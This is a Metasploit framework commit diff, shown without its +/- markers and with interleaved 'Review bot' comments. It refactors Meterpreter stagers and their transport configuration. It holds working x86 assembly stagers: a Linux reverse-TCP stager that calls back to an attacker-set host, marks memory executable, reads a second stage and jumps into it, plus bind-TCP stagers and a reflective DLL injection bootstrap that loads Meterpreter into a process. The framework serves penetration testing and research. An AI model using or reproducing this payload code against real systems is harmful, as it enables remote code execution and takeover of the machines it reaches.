Land #5300, meterpreter and stager multi-transport

unstable
Brent Cook 2015-05-14 00:05:53 -05:00
commit 7bbc171ca3
GPG Key ID: 1FFAA0B24B708F96
55 changed files with 1642 additions and 1172 deletions


@ -9,7 +9,7 @@ PATH
json
metasploit-concern (~> 1.0)
metasploit-model (~> 1.0)
metasploit-payloads (= 0.0.3)
metasploit-payloads (= 0.0.5)
msgpack
nokogiri
packetfu (= 1.1.9)
@ -123,7 +123,7 @@ GEM
activemodel (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (0.0.3)
metasploit-payloads (0.0.5)
metasploit_data_models (1.0.1)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)


@ -307,6 +307,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
begin
self.machine_id = self.core.machine_id(timeout)
self.payload_uuid ||= self.core.uuid(timeout)
return true
rescue ::Rex::Post::Meterpreter::RequestError
# This meterpreter doesn't support core_machine_id
@ -326,8 +328,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
begin
::Timeout.timeout(60) do
# Gather username/system information
username = self.sys.config.getuid
sysinfo = self.sys.config.sysinfo
username = self.sys.config.getuid
sysinfo = self.sys.config.sysinfo
safe_info = "#{username} @ #{sysinfo['Computer']}"
safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)
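Review bot: The value stored by `self.payload_uuid ||= self.core.uuid(timeout)` is reported by the remote end, so a tampered or hostile target can return any bytes; if payload_uuid is later used to match the session to a handler or registered payload, the raw reply should be parsed through Msf::Payload::UUID (or at least length/format-checked) before being trusted rather than assigned as-is. The `rescue ::Rex::Post::Meterpreter::RequestError` that follows now also covers a failed core_uuid, but its comment still says only "doesn't support core_machine_id", and machine_id has already been assigned by the time that failure occurs — if the rescue body (which continues outside the hunk) returns false, a session with a usable machine_id is reported as unsupported. Suggest `# This meterpreter doesn't support core_machine_id or core_uuid; machine_id may already be set`.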


@ -18,7 +18,6 @@ module MeterpreterOptions
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]),
OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]),
OptBool.new('StagerCloseListenSocket', [false, "Close the listen socket in the stager", false]),
OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]),
OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]),
OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]),


@ -90,7 +90,7 @@ module ReverseHopHttp
ReverseHopHttp.hop_handlers[full_uri] = self
self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri,
self) do |uri, hop_http|
hop_http.send_new_stage # send stage to hop
hop_http.send_new_stage(uri) # send stage to hop
delay = 1 # poll delay
# Continue to loop as long as at least one handler or one session is depending on us
until hop_http.refs < 1 && hop_http.handlers.empty?
@ -138,7 +138,7 @@ module ReverseHopHttp
:ssl => false,
})
# send new stage to hop so next inbound session will get a unique ID.
hop_http.send_new_stage
hop_http.send_new_stage(uri)
else
hop_http.lock.unlock
end
@ -241,34 +241,27 @@ module ReverseHopHttp
#
# Generates and sends a stage up to the hop point to be ready for the next client
#
def send_new_stage
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
def send_new_stage(uri)
# try to get the UUID out of the existing URI
info = process_uri_resource(uri)
uuid = info[:uuid] || Msf::Payload::UUID.new
# generate a new connect
sum = uri_checksum_lookup(:connect)
conn_id = generate_uri_uuid(sum, uuid)
url = full_uri + conn_id + "/\x00"
print_status("Preparing stage for next session #{conn_id}")
blob = stage_payload
#
# Patch options into the payload
#
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
:ssl => ssl?,
:url => url,
:expiration => datastore['SessionExpirationTimeout'],
:comm_timeout => datastore['SessionCommunicationTimeout'],
:ua => datastore['MeterpreterUserAgent'],
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass'])
blob = encode_stage(blob)
blob = stage_payload(
uuid: uuid,
uri: conn_id
)
#send up
crequest = mclient.request_raw(
'method' => 'POST',
'uri' => control,
'data' => blob,
'data' => encode_stage(blob),
'headers' => {'X-init' => 'true'}
)
res = mclient.send_recv(crequest)
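Review bot: `info[:uuid]` at the top of send_new_stage dereferences the result of process_uri_resource without a nil check; if that helper returns nil for a URI it does not recognise (the hop's full_uri is not necessarily a checksummed resource), the monitor thread raises NoMethodError and the hop is left with no pending stage. Guard it with `uuid = (info && info[:uuid]) || Msf::Payload::UUID.new`. Since the ssl/expiration/proxy patching was removed from this method, the hop stage now depends entirely on what stage_payload derives from the transport config, which is worth a one-line comment above the `stage_payload(` call so nobody re-adds the patch step.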


@ -1,7 +1,6 @@
# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
require 'rex/payloads/meterpreter/patch'
require 'rex/payloads/meterpreter/uri_checksum'
require 'rex/post/meterpreter/packet'
require 'rex/parser/x509_certificate'
@ -324,27 +323,12 @@ protected
resp['Content-Type'] = 'application/octet-stream'
blob = obj.stage_payload
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
datastore['HandlerSSLCert'])
#
# Patch options into the payload
#
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
:ssl => ssl?,
:url => url,
:ssl_cert_hash => verify_cert_hash,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
:ua => datastore['MeterpreterUserAgent'],
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass'])
# generate the stage, but pass in the existing UUID and connection id so that
# we don't get new ones generated.
blob = obj.stage_payload(
uuid: uuid,
uri: conn_id
)
resp.body = encode_stage(blob)
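Review bot: `verify_cert_hash` (computed from `get_ssl_cert_hash(datastore['StagerVerifySSLCert'], datastore['HandlerSSLCert'])`) is no longer consumed in this method once the patch_passive_service! block is gone — the hash is presumably produced inside `obj.stage_payload(uuid: uuid, uri: conn_id)` via the new transport config — so those two lines are dead work on every stage request unless something below the hunk reads it. Either drop them or pass the value through `stage_payload`, so the certificate pin the stager relies on has one source of truth. This assumes the sides are as printed; the rendered page lost the +/- markers.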


@ -1,75 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/parser/x509_certificate'
require 'msf/core/payload/uuid_options'
module Msf
##
#
# Helper functionality for handling of stageless http(s) payloads
#
##
module Handler::ReverseHttp::Stageless
include Msf::Payload::Windows::VerifySsl
include Msf::Payload::UUIDOptions
def initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
], self.class)
end
def generate_stageless(opts={})
unless opts[:generator]
raise ArgumentError, "Stageless generation requires a generator argument"
end
if opts[:ssl].nil?
raise ArgumentError, "Stageless generation requires an ssl argument"
end
host = datastore['LHOST']
host = "[#{host}]" if Rex::Socket.is_ipv6?(host)
url = "http#{opts[:ssl] ? "s" : ""}://#{host}:#{datastore['LPORT']}"
# Use the init_connect mode because we're stageless. This will force
# MSF to generate a new URI when the first request is made.
url << "#{generate_uri_uuid_mode(:init_connect)}/"
# invoke the given function to generate the architecture specific payload
opts[:generator].call(url) do |dll|
verify_cert_hash = nil
if opts[:ssl]
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
datastore['HandlerSSLCert'])
end
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
:url => url,
:ssl => opts[:ssl],
:ssl_cert_hash => verify_cert_hash,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
:ua => datastore['MeterpreterUserAgent'],
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass'])
end
end
end
end


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
module Msf
@ -14,31 +15,24 @@ module Msf
module Payload::Linux::BindTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Linux
def close_listen_socket
datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_bind_tcp(
port: datastore['LPORT'],
close_socket: close_listen_socket
)
end
conf = {
port: datastore['LPORT'],
close_socket: close_listen_socket,
reliable: true
port: datastore['LPORT'],
reliable: false
}
# Generate the more advanced stager if we have the space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:reliable] = true
end
generate_bind_tcp(conf)
end
@ -50,19 +44,20 @@ module Payload::Linux::BindTcp
Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end
def transport_config(opts={})
transport_config_bind_tcp(opts)
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = 104
space = cached_size
# Reliability checks add 4 bytes for the first check, 5 per recv check (2)
space += 14
# Adding 6 bytes to the payload when we include the closing of the listen
# socket
space += 6 if close_listen_socket
# TODO: coming soon
#space += 14
# The final estimated size
space
@ -77,7 +72,6 @@ module Payload::Linux::BindTcp
def asm_bind_tcp(opts={})
#reliable = opts[:reliable]
close_socket = opts[:close_socket]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
asm = %Q^
@ -99,10 +93,7 @@ module Payload::Linux::BindTcp
mov ecx,esp
mov al,0x66 ; socketcall syscall
int 0x80 ; invoke socketcall (SYS_SOCKET)
^
unless close_socket
asm << %Q^
; set the SO_REUSEADDR flag on the socket
push ecx
push 4
@ -119,11 +110,8 @@ module Payload::Linux::BindTcp
int 0x80
xchg eax,edi ; restore the socket handle
add esp, 0x14
pop ecx
^
end
pop ecx ; restore ecx
asm << %Q^
pop ebx
pop esi
push edx
@ -138,15 +126,8 @@ module Payload::Linux::BindTcp
shl ebx,1 ; SYS_LISTEN
mov al,0x66 ; socketcall syscall (SYS_LISTEN)
int 0x80 ; invoke socketcall
^
if close_socket
asm << %Q^
push eax ; stash the listen socket
^
end
asm << %Q^
inc ebx ; SYS_ACCEPT
mov al,0x66 ; socketcall syscall
mov [ecx+0x4],edx
@ -156,16 +137,9 @@ module Payload::Linux::BindTcp
mov al,0x3 ; read syscall
int 0x80 ; invoke read
xchg ebx,edi ; stash the accept socket in edi
^
if close_socket
asm << %Q^
pop ebx ; restore the listen socket
mov al,0x6 ; close syscall
int 0x80 ; invoke close
^
end
asm << %Q^
jmp ecx ; jump to the payload
^
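Review bot: In `generate`, the trailing comma on `conf[:exitfunk] = datastore['EXITFUNC'],` makes Ruby parse the two lines as one multiple assignment, so conf[:exitfunk] becomes the array `[datastore['EXITFUNC'], true]` (conf[:reliable] is still set to true). It should read `conf[:exitfunk] = datastore['EXITFUNC']`. The Linux asm_bind_tcp does not read :exitfunk, so the key is inert here, but the same line is repeated in the Windows bind_tcp generator where it matters. Separately, with the close_socket branches removed the Linux stager now always sets SO_REUSEADDR and leaves the listening socket open for the stage to close; the Windows rationale ("metsrv closes the listen socket") does not apply to a Linux stage, which deserves a comment at the SO_REUSEADDR block.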


@ -0,0 +1,128 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/linux'
module Msf
###
#
# Complex reverse TCP payload generation for Linux ARCH_X86
#
###
module Payload::Linux::ReverseTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Linux
#
# Generate the first stage
#
def generate
conf = {
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['ReverseConnectRetries'],
reliable: false
}
# Generate the advanced stager if we have space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end
generate_reverse_tcp(conf)
end
def transport_config(opts={})
transport_config_reverse_tcp(opts)
end
#
# Generate and compile the stager
#
def generate_reverse_tcp(opts={})
asm = asm_reverse_tcp(opts)
buf = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
apply_prepends(buf)
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = 300
# Reliability adds 10 bytes for recv error checks
space += 10
# The final estimated size
space
end
#
# Generate an assembly stub with the configured feature set and options.
#
# @option opts [Fixnum] :port The port to connect to
# @option opts [String] :host The host IP to connect to
# @option opts [Bool] :reliable Whether or not to enable error handling code
#
def asm_reverse_tcp(opts={})
# TODO: reliability is coming
retry_count = [opts[:retry_count].to_i, 1].max
reliable = opts[:reliable]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
asm = %Q^
xor ebx, ebx
mul ebx
push ebx
inc ebx
push ebx
push 0x2
mov al, 0x66
mov ecx, esp
int 0x80 ; sys_socketcall
xchg eax, edi
pop ebx
push #{encoded_host}
push #{encoded_port}
mov ecx, esp
push 0x66
pop eax
push eax
push ecx
push edi
mov ecx, esp
inc ebx
int 0x80 ; sys_socketcall
mov dl, 0x7
mov ecx, 0x1000
mov ebx, esp
shr ebx, 0xc
shl ebx, 0xc
mov al, 0x7d
int 0x80 ; sys_mprotect
pop ebx
mov ecx, esp
cdq
mov dh, 0xc
mov al, 0x3
int 0x80 ; sys_read
jmp ecx
^
asm
end
end
end
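Review bot: asm_reverse_tcp computes `retry_count` and `reliable` and then never uses them — the emitted assembly performs a single connect, a single read, and `jmp ecx` into whatever arrived, with no error check and no reconnect loop — so the `@option opts [Bool] :reliable Whether or not to enable error handling code` doc and the ReverseConnectRetries datastore option both promise behaviour this stager does not deliver. Until the TODO lands, document it honestly, e.g. `# @option opts [Bool] :reliable Accepted for interface parity; no error handling is emitted yet` and the same for `:retry_count`, or drop the unused locals. `required_space` also hard-codes `space = 300` while the bind_tcp sibling switched to `cached_size`; if the stub grows, this estimate silently diverges from the real size.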


@ -0,0 +1,71 @@
# -*- coding: binary -*-
require 'msf/core/payload/uuid_options'
##
# This module contains helper functions for creating the transport
# configuration stubs that are used for Meterpreter payloads.
##
module Msf::Payload::TransportConfig
include Msf::Payload::UUIDOptions
def transport_config_reverse_tcp(opts={})
config = transport_config_bind_tcp(opts)
config[:lhost] = datastore['LHOST']
config
end
def transport_config_reverse_ipv6_tcp(opts={})
config = transport_config_reverse_tcp(opts)
config[:scheme] = 'tcp6'
config[:scope_id] = datastore['SCOPEID']
config
end
def transport_config_bind_tcp(opts={})
{
:scheme => 'tcp',
:lhost => datastore['LHOST'],
:lport => datastore['LPORT'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i
}
end
def transport_config_reverse_https(opts={})
config = transport_config_reverse_http(opts)
config[:scheme] = 'https'
config[:ssl_cert_hash] = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
datastore['HandlerSSLCert'])
config
end
def transport_config_reverse_http(opts={})
# most cases we'll have a URI already, but in case we don't
# we should ask for a connect to happen given that this is
# going up as part of the stage.
uri = opts[:uri]
unless uri
sum = uri_checksum_lookup(:connect)
uri = generate_uri_uuid(sum, opts[:uuid])
end
{
:scheme => 'http',
:lhost => datastore['LHOST'],
:lport => datastore['LPORT'].to_i,
:uri => uri,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass']
}
end
end
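Review bot: transport_config_reverse_https calls `get_ssl_cert_hash`, which this module neither defines nor includes (only Msf::Payload::UUIDOptions is mixed in), so it works only when the including payload also mixes in Msf::Payload::Windows::VerifySsl; ReverseWinHttps does, but any other includer gets a NoMethodError at stage time. Because this value is what allows the stager to pin the handler certificate, the dependency should be explicit rather than incidental: add `require 'msf/core/payload/windows/verify_ssl'` and `include Msf::Payload::Windows::VerifySsl` here, or at minimum a comment on the method stating the requirement.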


@ -24,6 +24,8 @@ module Msf::Payload::Windows
require 'msf/core/payload/windows/dllinject'
require 'msf/core/payload/windows/exec'
require 'msf/core/payload/windows/loadlibrary'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/core/payload/windows/reflectivedllinject'
require 'msf/core/payload/windows/x64/reflectivedllinject'
@ -32,10 +34,12 @@ module Msf::Payload::Windows
#
@@exit_types =
{
nil => 0, # Default to nothing
'' => 0, # Default to nothing
'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
'thread' => 0x0A2A1DE0, # ExitThread
'process' => 0x56A2B5F0, # ExitProcess
'none' => 0x5DE2C5AA, # GetLastError
'none' => 0x5DE2C5AA # GetLastError
}
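Review bot: The exit_types table is the only validation an EXITFUNC value ever gets, and an unrecognised string (or, if only one of the `nil => 0` / `'' => 0` entries survives this change, the other empty form) still maps to nil; lookups such as `Msf::Payload::Windows.exit_types[opts[:exitfunk]]` in the RDI bootstrap then feed nil into `"0x%.8x" %`, which raises a bare TypeError with no hint that EXITFUNC was the cause. Consider a `fetch` with a descriptive error at the lookup sites, or a comment here noting that both nil and '' must remain valid keys because callers pass the datastore value through unchanged. Which of the two entries is the added side is not recoverable from the rendered page.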
#


@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
@ -16,37 +17,33 @@ module Msf
module Payload::Windows::BindTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
def close_listen_socket
datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_bind_tcp(
port: datastore['LPORT'].to_i,
close_socket: close_listen_socket
)
end
conf = {
port: datastore['LPORT'].to_i,
exitfunk: datastore['EXITFUNC'],
close_socket: close_listen_socket,
reliable: true
port: datastore['LPORT'],
reliable: false
}
# Generate the more advanced stager if we have the space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:reliable] = true
end
generate_bind_tcp(conf)
end
def transport_config(opts={})
transport_config_bind_tcp(opts)
end
#
# Generate and compile the stager
#
@ -67,8 +64,7 @@ module Payload::Windows::BindTcp
#
def required_space
# Start with our cached default generated size
# TODO: need help with this from the likes of HD.
space = 277
space = cached_size
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
@ -78,11 +74,6 @@ module Payload::Windows::BindTcp
# Reliability checks add 4 bytes for the first check, 5 per recv check (2)
space += 14
# if the payload doesn't need the listen socket closed then we save space. This is
# the case for meterpreter payloads, as metsrv now closes the listen socket once it
# kicks off (needed for more reliable shells).
space -= 8 unless close_listen_socket
# The final estimated size
space
end
@ -97,7 +88,6 @@ module Payload::Windows::BindTcp
def asm_bind_tcp(opts={})
reliable = opts[:reliable]
close_socket = opts[:close_socket]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
asm = %Q^
@ -167,22 +157,12 @@ module Payload::Windows::BindTcp
push edi ; listening socket
push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
call ebp ; accept( s, 0, 0 );
^
if close_socket
asm << %Q^
push edi ; push the listening socket to close
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call ebp ; closesocket( s );
^
else
asm << %Q^
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
^
end
push edi ; push the listening socket
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call ebp ; closesocket( s );
asm << %Q^
recv:
; Receive the size of the incoming second stage...
push 0 ; flags
@ -213,7 +193,6 @@ module Payload::Windows::BindTcp
; Receive the second stage and execute it...
xchg ebx, eax ; ebx = our new memory address for the new stage
push ebx ; push the address of the new stage so we can return into it
read_more: ;
push 0 ; flags
push esi ; length
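Review bot: In `generate`, `conf[:exitfunk] = datastore['EXITFUNC'],` with the trailing comma is parsed as a multiple assignment, so conf[:exitfunk] ends up as the array `[datastore['EXITFUNC'], true]`; the Windows stager does consume :exitfunk (via the Exitfunk mixin, presumably through the exit_types table), and an Array key there looks up nil, so the advanced stager is generated with a broken or missing exit routine whenever there is space for it. The fix is `conf[:exitfunk] = datastore['EXITFUNC']`. The removal of `.to_i` on `port: datastore['LPORT']` is harmless since asm_bind_tcp converts it, but the two conf hashes in this method were consistent before and now differ.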


@ -0,0 +1,98 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/reflective_dll_loader'
module Msf
###
#
# Common module stub for ARCH_X86 payloads that make use of Meterpreter.
#
###
module Payload::Windows::MeterpreterLoader
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows
def initialize(info = {})
super(update_info(info,
'Name' => 'Meterpreter & Configuration RDI',
'Description' => 'Inject Meterpreter & the configuration stub via RDI',
'Author' => [ 'sf', 'OJ Reeves' ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' => { 'Convention' => 'sockedi -https', },
'Stage' => { 'Payload' => "" }
))
end
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
dec ebp ; 'M'
pop edx ; 'Z'
call $+5 ; call next instruction
pop ebx ; get the current location (+7 bytes)
push edx ; restore edx
inc ebp ; restore ebp
push ebp ; save ebp for later
mov ebp, esp ; set up a new stack frame
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader() (0x????????)
add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
call ebx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
; offset from ReflectiveLoader() to the end of the DLL
add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
^
unless opts[:stageless]
asm << %Q^
mov [ebx], edi ; write the current socket to the config
^
end
asm << %Q^
push ebx ; push the pointer to the configuration start
push 4 ; indicate that we have attached
push eax ; push some arbitrary value for hInstance
call eax ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
^
end
def stage_meterpreter(stageless=false)
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll'))
asm_opts = {
rdi_offset: offset,
length: dll.length,
stageless: stageless
}
asm = asm_invoke_metsrv(asm_opts)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!"
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
dll
end
end
end
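Review bot: asm_invoke_metsrv encodes a layout contract that is not documented anywhere in this file: `add ebx, opts[:length] - opts[:rdi_offset]` assumes `:length` is the size of the bare metsrv DLL before any configuration block is appended, and `mov [ebx], edi` assumes the first DWORD of that appended block is the socket-handle slot. Both should be stated at the method, e.g. `# opts[:length] must be the DLL size without the trailing config block; the first DWORD of the config is the socket handle, patched from edi for staged transports` — a caller that passes the combined length silently points DllMain at garbage. The `stageless=false` positional boolean in stage_meterpreter would also read better as a keyword (`stage_meterpreter(stageless: false)`), though that is an interface choice for the callers not shown here.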


@ -30,11 +30,7 @@ module Payload::Windows::ReflectiveDllInject
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' => { 'Convention' => 'sockedi -https', },
'Stage' =>
{
'Offsets' => { 'EXITFUNC' => [ 33, 'V' ] },
'Payload' => ""
}
'Stage' => { 'Payload' => "" }
))
register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
@ -44,65 +40,59 @@ module Payload::Windows::ReflectiveDllInject
datastore['DLL']
end
def stage_payload(target_id=nil)
def asm_invoke_dll(opts={})
asm = %Q^
; prologue
dec ebp ; 'M'
pop edx ; 'Z'
call $+5 ; call next instruction
pop ebx ; get the current location (+7 bytes)
push edx ; restore edx
inc ebp ; restore ebp
push ebp ; save ebp for later
mov ebp, esp ; set up a new stack frame
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader() (0x????????)
add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
call ebx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
push edi ; push the socket handle
push 4 ; indicate that we have attached
push eax ; push some arbitrary value for hInstance
mov ebx, eax ; save DllMain for another call
call ebx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
push #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; indicate that we have detached
push eax ; push some arbitrary value for hInstance
call ebx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
end
def stage_payload
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(library_path)
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
asm_opts = {
rdi_offset: offset,
exitfunk: 'thread' # default to 'thread' for migration
}
bootstrap = "\x4D" + # dec ebp ; M
"\x5A" + # pop edx ; Z
"\xE8\x00\x00\x00\x00" + # call 0 ; call next instruction
"\x5B" + # pop ebx ; get our location (+7)
"\x52" + # push edx ; push edx back
"\x45" + # inc ebp ; restore ebp
"\x55" + # push ebp ; save ebp
"\x89\xE5" + # mov ebp, esp ; setup fresh stack frame
"\x81\xC3" + [offset-7].pack( "V" ) + # add ebx, 0x???????? ; add offset to ReflectiveLoader
"\xFF\xD3" + # call ebx ; call ReflectiveLoader
"\x89\xC3" + # mov ebx, eax ; save DllMain for second call
"\x57" + # push edi ; our socket
"\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached
"\x50" + # push eax ; some value for hinstance
"\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
"\x68" + exit_funk + # push 0x???????? ; our EXITFUNC placeholder
"\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
"\x50" + # push eax ; some value for hinstance
"\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
asm = asm_invoke_dll(asm_opts)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if( bootstrap.length > 62 )
print_error( "Reflective Dll Injection (x86) generated an oversized bootstrap!" )
return
if bootstrap.length > 62
raise RuntimeError, "Reflective DLL Injection (x86) generated an oversized bootstrap!"
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
# patch in the timeout options
timeout_opts = {
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
}
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(dll, timeout_opts)
# patch the target ID into the URI if specified
if target_id
i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
if i
t = target_id.to_s
raise "Target ID must be less than 5 bytes" if t.length > 4
u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
print_status("Patching Target ID #{t} into DLL")
dll[i, u.length] = u
end
end
# return our stage to be loaded by the intermediate stager
return dll
dll
end
end
